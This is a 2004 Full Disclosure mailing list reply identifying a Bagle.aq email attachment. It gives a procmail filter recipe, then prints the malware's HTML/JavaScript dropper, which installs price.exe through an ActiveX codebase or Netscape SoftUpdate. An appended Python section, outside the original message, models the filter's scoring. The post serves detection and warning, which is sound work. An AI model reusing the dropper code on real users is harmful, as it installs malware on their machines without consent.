Full Disclosure mailing list archives
Re: (no subject)
From: Tremaine <tremaine () gmail com>
Date: Mon, 9 Aug 2004 15:29:23 -0600
On Mon, 9 Aug 2004 13:03:54 -0600, Jonathan Grotegut <jgrotegut () directpointe com> wrote:
(In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut
Bagle.aq with Mitglieder-like dropper

Procmail recipe (courtesy of offlist associate), use at your own risk.

[code]
:0 BD
* -1000^0
* 300^0 YJuA6wS8WsBr
* 300^0 zGzjbJDCLB96
* 300^0 BOSKHdXH8Blw
* 300^0 dEi3loqk64su
* 300^0 byusWle0odyf
/dev/null
[/code]

price dot html file included in zip:

[code]
<head>
<script language="JavaScript">
var exepath='price/price.exe';
</script>
<SCRIPT LANGUAGE="JavaScript">
<!--
var bname=navigator.appName;
sewre = "rseI";
var bver=parseInt(navigator.appVersion);
function install() {
  if ( navigator.platform && navigator.platform != 'Win32' ) {
    location.replace('NOTWIN32WARNING.html');
    return;
  }
  if (bname == 'Microsoft Internet Explorer' && bver >= 2) {
    document.write('<object id="gib" width=1 height=1 classid="CLSID:018B7EC3-EECA-11d 3-8E71-0000E82C6C0D" codebase="'+exepath+'"></object>');
  } else if (bname == 'Netscape' && bver >= 4) {
    trigger = netscape.softupdate.Trigger;
    if (trigger.UpdateEnabled) {
      trigger.StartSoftwareUpdate(exepath, trigger.DEFAULT_MODE)
    } else {
      location.replace(exepath);
    }
  } else {
    location.replace(exepath);
  }
}
install();
// -->
</script>
</head>
[/code]

Definitions available on McAfee and Trend Micro, and it appears Symantec should have something by about 6pm.

--
Tremaine
IT Security Consultant

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
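How the weights in the procmail recipe above combine, as an added example that is not part of the original message: a simplified Python model of procmail scoring that handles only `w^0` conditions and treats its input as the message body (the `B` flag). It shows that four of the five base64 fragments must be present before the mail is sent to /dev/null; `parse_recipe`, `score`, `would_discard` and `sample_body` are hypothetical names and the sample bodies are constructed.

```python
import re

# Recipe exactly as posted in the message above.
RECIPE = """\
:0 BD
* -1000^0
* 300^0 YJuA6wS8WsBr
* 300^0 zGzjbJDCLB96
* 300^0 BOSKHdXH8Blw
* 300^0 dEi3loqk64su
* 300^0 byusWle0odyf
/dev/null
"""

COND = re.compile(r"^\*\s*(-?\d+)\^(\d+)\s*(.*)$")  # "* w^x regex"

def parse_recipe(text):
    """Return (flags, [(weight, pattern), ...], action) for a scored recipe."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    flags = lines[0].partition(" ")[2].strip()      # ":0 BD" -> "BD"
    conds = []
    for ln in lines[1:-1]:
        m = COND.match(ln)
        if not m or int(m.group(2)) != 0:
            raise ValueError("only 'w^0' conditions are modelled: " + ln)
        conds.append((int(m.group(1)), m.group(3)))
    return flags, conds, lines[-1]

def score(body, flags, conds):
    """Sum the weights: with exponent 0 a condition counts once, however often it matches."""
    re_flags = 0 if "D" in flags else re.IGNORECASE  # D = case-sensitive matching
    total = 0
    for weight, pattern in conds:
        # An empty pattern always matches, so "* -1000^0" sets the starting score.
        if pattern == "" or re.search(pattern, body, re_flags):
            total += weight
    return total

def would_discard(body, recipe=RECIPE):
    """The recipe fires, and the mail goes to /dev/null, only when the score is positive."""
    flags, conds, action = parse_recipe(recipe)
    return action == "/dev/null" and score(body, flags, conds) > 0

def sample_body(n):
    """Constructed input: n filler lines, each carrying one of the recipe's fragments."""
    frags = [p for _, p in parse_recipe(RECIPE)[1] if p][:n]
    return "\n".join("QUFB" + f + "QUFB" for f in frags)

if __name__ == "__main__":
    for n in range(6):
        print(n, score(sample_body(n), *parse_recipe(RECIPE)[:2]), would_discard(sample_body(n)))
```

Because the `D` flag makes matching case-sensitive, a body whose base64 has been re-encoded or case-folded scores -1000 and is delivered normally.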